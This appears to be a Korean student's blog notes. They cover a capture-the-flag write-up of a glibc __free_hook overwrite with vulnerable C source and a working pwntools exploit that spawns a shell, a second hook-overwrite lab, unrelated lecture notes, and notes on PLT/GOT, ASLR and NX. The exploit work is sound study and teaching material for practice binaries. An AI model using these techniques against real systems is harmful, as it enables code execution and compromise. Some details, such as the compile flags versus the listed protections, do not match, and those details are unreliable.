🕮 소스 코드

 // gcc -o init_fini_array init_fini_array.c -Wl,-z,norelro
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(60);
}

int main(int argc, char *argv[]) {
    long *ptr;
    size_t size;

    initialize();

    printf("stdout: %p\n", stdout);

    printf("Size: ");
    scanf("%ld", &size);

    ptr = malloc(size);

    printf("Data: ");
    read(0, ptr, size);

    *(long *)*ptr = *(ptr+1);

    free(ptr);
    free(ptr);

    system("/bin/sh");
    return 0;
}

⚙️실습 환경

• 64 bit와 little-endian 형식으로 이루어짐
• Full RELRO : 특정 섹션에서 writable권한이 없음
• Canary : Buffer Overflow시 canary값을 유지해야함
• NX enabled : Shellcode를 주입하여 실행할 수 없음
• No PIE : 코드 영역에서 random화가 일어나지 않는다.

✅ 문제 접근

1. 취약점 분석

1) libc_base 구하기

      printf("stdout: %p\n", stdout);

• printf 함수를 이용하여 libc에 있는 stdout의 실제 주소를 얻을 수 있다. libc의 버전을 알면 stdout의 libc 안에서의 상대적인 위치를 얻을 수 있기에 이를 이용하면 실행할 때 libc의 시작주소를 구할 수 있다.

2) 원하는 주소에 원하는 값을 넣을 수 있다.

    read(0, ptr, size);
    *(long *)*ptr = *(ptr+1);

• size는 유저로 부터 받기에 ptr에 원하는 값을 넣을 수 있다.
• *(long *)*ptr을 해석하는 것이 중요하다.
  1. *ptr 값은 사용자가 입력한 값을 가리킨다.
  2. (long *)*ptr은 사용자가 입력한 값을 주소처럼 생각한다는 뜻이다.
  3. *(long *)*ptr은 사용자가 입력한 값이 가리키는 장소의 값을 뜻한다.

정리하면 다음과 같다.

사용자가 넣은 값 ptr[0]이 가리키는 곳에 ptr[1]의 값을 넣는다.

3) system("/bin/sh")

     system("/bin/sh");

• main 함수에 존재하는 system("/bin/sh")을 이용하면, shell을 얻을 수 있다.

2. 공격 설계

malloc과 free를 호출하고 있으므로 malloc_hook혹은 free_hook을 이용하고, 1-2에서 본 취약점을 이용하여 hook변수의 값을 임의로 바꾼다.

read함수 이후에는 free가 나타나기 때문에, free_hook을 이용하여 문제를 풀 수 있다.

Flow

1. libc의 주소를 stdout을 이용하여 구한다.
2. ptr에 __free_hook의 주소와 원하는 주소의 흐름을 넣는다.
3. free가 호출되면서 __free_hook이 가리키는 주소로 간다.

이때 원하는 주소의 흐름으로 넣을 수 있는 것은 한번에 쉘을 딸 수 있는 one_gadget을 이용하거나, system("/bin/sh")를 이용한다. 이때 system함수 같은 경우, main에서 호출되었기 때문에, 이 주소를 이용하면 사용할 수 있다 (No PIE 이기에 가능함)

✅ 문제 풀이

1. libc의 주소를 stdout을 이용하여 구한다.

• libc의 경우 libc-2.23.so이 주어졌기에 이를 이용하여 stdout의 상대적 거리(offset)를 구한다.

readelf를 이용하여 구하였다. pwntools의 .symbols['stdout']을 이용하여도 무관하다. stdout_offset = 0x3c5708

• libc의 주소를 받기 위하여 pwntools를 이용하였다.

    p.recvuntil("stdout: ")
    stdout_address =int(p.recvline()[:-1],16)

  이렇게 된다면 libc의 시작 주소는 stdout_address - stdout_offset을 이용하면 구할 수 있다.

2. __free_hook과 원하는 실행 주소를 넣는다.

• __free_hook의 경우 libc에 정의 되어 있기 때문에 똑같이 offset을 구하고 실제 주소를 구한다. __free_hook의 offset을 구하였으니, libc_base와 함께 실제 주소를 구할 수 있다. 물론 gdb-peda에서 실행 후 print &__free_hook을 사용하여 주소를, vmmap을 이용하여 libc의 시작주소를 구하여 둘을 빼서 offset을 구할 수도 있다. pwntools 역시 가능

• 이후 원하는 주소를 넣을 것인데 one_shot가젯을 넣어본다. one_gadget libc-2.23.so을 이용하여 가젯을 구한다. 이 값들 중 constraints를 만족하는 주소를 넣어주면 된다.
  

3. 페이로드 작성 read에 넣을 내용으로 __free_hook의 주소와 one_shot의 주소를 넣어준다. 두 주소 모두 8byte 이므로 long과 같은 타입으로 위에서 언급한 주소에 값 넣기가 진행된다.

⚔️ Exploit Code

    from pwn import *

    p = process("./hook")
    e = ELF("./hook")
    libc = ELF('./libc-2.23.so')

    # receive stdout's address
    p.recvuntil("stdout: ")
    stdout_address =int(p.recvline()[:-1],16)
    print("stdout:",hex(stdout_address))

    # stdout's offset = 0x3c5708
    libc_base = stdout_address - libc.symbols["_IO_2_1_stdout_"]
    print("libc_base:",hex(libc_base))

    # __free_hook's offset = 0x3c3ef8
    free_hook = libc_base + libc.symbols["__free_hook"]
    print("__free_hook:",hex(free_hook))

    one_shot_offset = [0x45226,0x4527a,0xf03a4,0xf1247]
    one_shot = libc_base + one_shot_offset[1]
    print("one_shot:",hex(one_shot))

    payload = p64(free_hook)
    payload += p64(one_shot)

    p.recvuntil("Size: ")
    p.sendline('1000')

    p.recvuntil("Data: ")
    p.sendline(payload)

    p.interactive()

실행 결과

마치며

system("/bin/sh")을 이용하는 방법에 대하여서도 생각하여 해보길 추천함

• hook : 갈고리라는 뜻으로 운영체제가 어떤 코드를 실행하려고 할 때, 이를 낚아채어 다른 코드가 실행되게 하는 것을 Hooking(후킹) 이라고 부른다.

• Hook Overwrite : Glibc 2.33 이하 버전에서는 malloc()과 free()를 호출할 때 함께 훅(Hook)이 함수 포인터 형태로 존재한다. 이 함수 포인터를 Overwrite하여 코드를 실행하면, Full RELRO를 우회할 수 있다. (Full RELRO에도 libc에는 쓰기가 가능하기 때문이다)

Hook의 작동 방식 - libc는 디버깅 편의를 위해 hook 변수가 정의 되어 있다. ex) __malloc_hook ,__free_hook ,--realloc_hook - malloc()함수는 __malloc_hook의 값이 NULL인지 검사합니다. - NULL이 아니라면 hook에 인자를 넘기고 __malloc_hook이 가리키는 함수를 먼저 실행한다.

• 이 값들은 .bss영역에 있기 때문에 쓰기가 가능하므로 조작 가능하다.

Hook Overwrite ✍️

Hook 변수를 덮어 쓰고, 인자를 전달하면 공격할 수 있다.

• malloc("/bin/sh") : __malloc_hook을 system함수의 주소로 덮는다.

이제는 사라진 hook 변수 : 악용되기 쉽고, 다발적으로 사용할 때 성능에 악영향을 주는 이유로, Glibc 2.34 부터는 제거되었다.

실습 🧪

문제 🚩

// Name: fho.c
// Compile: gcc -o fho fho.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
  char buf[0x30];
  unsigned long long *addr;
  unsigned long long value;
  setvbuf(stdin, 0, _IONBF, 0);
  setvbuf(stdout, 0, _IONBF, 0);

  puts("[1] Stack buffer overflow");
  printf("Buf: ");
  read(0, buf, 0x100);
  printf("Buf: %s\n", buf);

  puts("[2] Arbitrary-Address-Write");
  printf("To write: ");
  scanf("%llu", &addr);
  printf("With: ");
  scanf("%llu", &value);
  printf("[%p] = %llu\n", addr, value);
  *addr = value;

  puts("[3] Arbitrary-Address-Free");
  printf("To free: ");
  scanf("%llu", &addr);
  free(addr);
  return 0;
}

• [1] Buffer Overlflow를 일으킬 수 있다.
• [2] 임의 주소에 임의 값을 넣을 수 있다.
• [3] 임의 인자를 주고 free를 호출할 수 있다.

checksec 🔓

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

설계 📘

** - Library의 변수 및 함수들의 주소 구하기**

• libc에서 __free_hook, system@, "/bin/sh" 문자열을 구하자

• readelf -sr libc-2.27.so | grep " __free_hook@" readelf -s libc-2.27.so | grep " system@" strings -tx libc-2.27.so | grep "/bin/sh"

[1]에서 변수와 함수의 주소를 구한다. [2]에서 __free_hook의 값을 system함수의 주소로 덮어쓴다. [3]에서 "/bin/sh"를 해제한다.

** Exploit ⚔️ **

• libc의 시작 주소를 구하기 위하여 __libc_start_main을 확인한다. __libc_start_main : _start()에서 __libc_start_main()을 호출하면 main()이 호출된다.

  (gdb) b * main (gdb) r (gdb) bt

• bt를 이용하면 함수를 호출한 관계를 볼 수 있다. 그 방법으로 main의 RET를 참고하여 이전 함수인 __libc_start_main을, __libc_start_main의 RET를 이용하여 _start()를 구할 수 있는 것 같다. x/i (bt에서 나온 __libc_start_main의 주소)를 이용하면 <__libc_start_main + offset>으로 나타난 offset을 구할 수 있다.

• __libc_start_main의 offset을 readelf를 이용하여 구하면 0x21b10이다.

• offset은 +231이다.

  따라서 __libc_start_main+231을 릭한 후, 해당값에서 0x21b10 +231을 빼면 libc_base를 구할 수 있다. 이를 이용하면 다른 libc기반 함수들도 사용할 수 있다. 참고로 __libc_start_main+231의 값은 main의 ret주소이다.

이를 이용하여 __libc_start_main+231의 주소를 leak한 후, libc_base를 구하고, __free_hook을 system으로 바꾼다. 이후 /bin/sh를 free의 인자로 넣는다.

마치며

다음에는 이를 활용한 예제를 write-up 하겠습니다.

• One Shot gadget을 이용하면 한번에 shell을 획득할 수 있다.
• 이 가젯은 libc안에 있으며, libc_base를 구하여 실제 oneshot주소를 실행시켜 동작할 수 있다.

One shot gadget 을 찾는법

• 간단한 방법으로는 one_gadget을 이용하여 찾는다. one_gadget (libc_version)

ex) one_shot libc.so.6

• constraints : 실행하기 위한 조건 (조건이 충족되어야 쉘이 실행됨)
• 현재 4개의 one_gadget offset을 발견할 수 있었다.

이를 통해 libc_base + one_gadget offset을 return address 에 삽입하면 shell이 동작하게 된다.

libc의 base주소를 구하는 방법

• objdump -D (libc) | grep "stdout" 을 이용하면 stdout의 offset 구할 수 있다.
• gdb에서 실행시킨 후 print stdout - vmmap을 이용하면 구할 수 있다.

하지만 필자는 워게임을 풀며, 아래의 방법에서 구한 offset이 달라 고생했는데 아직 이유를 찾지 못하였다.

일시 : 4/6(목) 5시 ~ 5:50 강사 : 이동범 (지니언스 대표, 정보보호산업협회회장) ** 강의명 :** Connecting the dots

강연 내용

1. 자신을 믿어라

2. 타고난 모습대로 .. 자신의 성향대로

• 주변 환경에 휩쓸리면 자신만의 선을 만들 수 없다
• 자신에 대하여 알아야 한다 (TCI 검사 추천)
  

3. 끈기, 치열함

• 실력이 없어서 못하는걸 인정하고 실력을 기른다 -> 끈기가 없는게 아니다
• 지속성이 필요하다 -> 나중에 끌어내어 다시 할 수 있는 능력
  

4. 기회가 오면 과감히 잡아라 !

• 한번 해본 사람에게 계속해서 기회가 온다
• 실패도 중요한 자산이다
  

5. Giver가 되라

• Giver, Taker, Give and Taker가 있다

• 가장 크게 성공하는 사람은 ? Giver

• 가장 크게 망하는 사람은 ? Giver ++ ** Taker 를 구분할 수 있나?**

• Giver가 더 크게 성공한다

• 앞으로의 세대는 천재가 혼자 만들어 갈 수 없다

  
  
  

QnA

Q1. 실력,노력 부분 어떻게 해야할까요?

** Answer : 지금은 선택을 할 때, 실패해도 도전하기, 학부 때 모든 선택은 괜찮다**

Q2. 잘 나가다가 스타트업 어떻게?

** Answer : 여러 사람들과 함께하며 도전하게 됨 **

Q3. 사람은 계획하는 동물인데 미래를 보며 planning 하면 안되나?

** Answer : Planning은 좋다. 완료 -> 전단계를 생각하며 계획 (backward) **

Link

• Link(링크)는 어떤 라이브러리의 함수를 사용할때 이를 연결해주는 역할을 한다.

• Link는 정적 링크(Static link)와 동적 링크(Dynamic link)로 구별할 수 있다.

Static Link

• Static Link 는 정적으로 링크되는 것으로 컴파일 시 모든 라이브러리가 함께 로드된다.

  🚩 장점 탐색의 비용이 절감된다.

  🚩 단점 여러 바이너리에서 라이브러리를 사용하여 복제가 여러번 이루어져 크기가 커진다.

Dynamic Link

• Dynamic Link 는 동적으로 링크되는 것으로 실행 시 라이브러리의 함수가 매핑 되어 사용된다.

  🚩 장점 효율적이고 자연스러운 매핑이 가능하다.

  🚩 단점 정적으로 매핑 할때보다 느리다.

❓ Dynamic Link 하는 방법

Dynamic Link는 PLT와 GOT를 통해 이루어진다

PLT (Procedure Linkage Table) : 다른 라이브러리에 있는 프로시저를 호출하는 테이블 ** GOT (Global Offset Table) : PLT가 참조하는 테이블로 프로시저의 주소가 들어있다**

 **즉, PLT와 GOT를 참조하여 함수를 동적 링크하여 사용할 수 있다**

PLT를 호출하면 GOT를 참조하여 라이브러리 속 실제 함수의 주소를 구하여 실행한다 이때 호출된 함수의 주소는 GOT에 저장되어 다음 호출에 바로 사용된다

ASLR

 >**ASLR (Addres Space Layout Randomization) : 바이너리가 실행될 때마다 _스택, 힙, 공유 라이브러리_ 등을 임의의 주소로 할당하는 보호 기법**

ASLR 은 기본적으로 설정된다

cat /proc/sys/kernel/randomize_va_space 를 통해 커널에서 보호되고 있는지 확인 가능하다

** 0 : No ASLR 1 : 스택, 힙, 라이브러리, vdso 2 : 1의 영역 + brk영역**

• PLT와 GOT영역은 바뀌지 않는다 (PIE가 적용되지 않았다면)

NX

*NX (No-eXecute) : 실행에 사용되는 메모리 영역과 쓰기에 사용되는 메모리 영역을 분리하는 보호기법 *

• 실행 권한이 없기 때문에 NX 보호 기법이 적용되면 Shell code를 주입하여 실행할 수 없다.

Next Time

• Return to Library
• Return Oriented Programming